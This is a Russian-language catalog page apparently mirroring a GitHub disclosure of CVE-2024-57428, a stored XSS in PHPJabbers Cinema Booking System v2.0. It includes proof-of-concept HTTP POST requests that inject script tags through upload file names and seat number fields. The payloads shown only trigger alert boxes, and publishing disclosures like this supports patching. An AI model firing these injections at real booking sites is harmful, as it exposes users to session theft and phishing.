Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-57428 — CVE-2024-57428: PHPJabbers Cinema Booking System v2.0 страдает от хранимого XSS, что позволяет осуществлять постоянное внедрение JavaScript для фишинговых атак и атак с использованием вредоносного ПО. | Kitploit
Инструменты/GitHubGitHub/ahrixia/cve-2024-57428
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийФишингТестирование на Проникновение
GitHubahrixia/cve-2024-57428

CVE-2024-57428

CVE-2024-57428: PHPJabbers Cinema Booking System v2.0 страдает от хранимого XSS, что позволяет осуществлять постоянное внедрение JavaScript для фишинговых атак и атак с использованием вредоносного ПО.

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-57428

Уязвимость хранимого межсайтового скриптинга (XSS) в PHPJabbers Cinema Booking System v2.0 существует из-за непроверенного ввода в полях загрузки файлов (event_img, seat_maps) и конфигурациях номеров мест (number[new_X] в pjActionCreate). Злоумышленники могут внедрять постоянный JavaScript, что приводит к фишингу, внедрению вредоносного ПО и перехвату сессий.

Уязвимый параметр: event_img и seat_maps's file name

Воздействие:

Хранимый XSS более серьёзен, чем отражённый XSS, поскольку он затрагивает всех пользователей, получающих доступ к внедрённому содержимому. Его можно использовать для устойчивых фишинговых атак, кражи сессий или внедрения вредоносного ПО в большую базу пользователей.

Эксплойт - Proof of Concept (POC)

Хранимый межсайтовый скриптинг (XSS)

Хранимый XSS при загрузке файла

Полезная нагрузка: \">

root@kitploit:~
POST /CinemaBookingDev/index.php?controller=pjAdminEvents&action=pjActionCreate HTTP/1.1
Host: 127.0.0.1
Content-Length: 38611
[SNIP]


------WebKitFormBoundaryKOsvqJhAGpZAt33t
Content-Disposition: form-data; name="event_img"; filename="luffy.jpg\">"
Content-Type: image/jpeg

НОМЕР МЕСТА В КИНОЗАЛЕ

Полезная нагрузка: "><script>alert(x)</script>

root@kitploit:~
POST /CinemaBookingDev/index.php?controller=pjAdminVenues&action=pjActionCreate HTTP/1.1
Host: 127.0.0.1
Content-Length: 1812
[SNIP]


------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="seats_count"

11
------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="number[new_1]"

1"><script>alert(1)</script>1
------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="number[new_2]"

2"><script>alert(2)</script>2
Скачать инструмент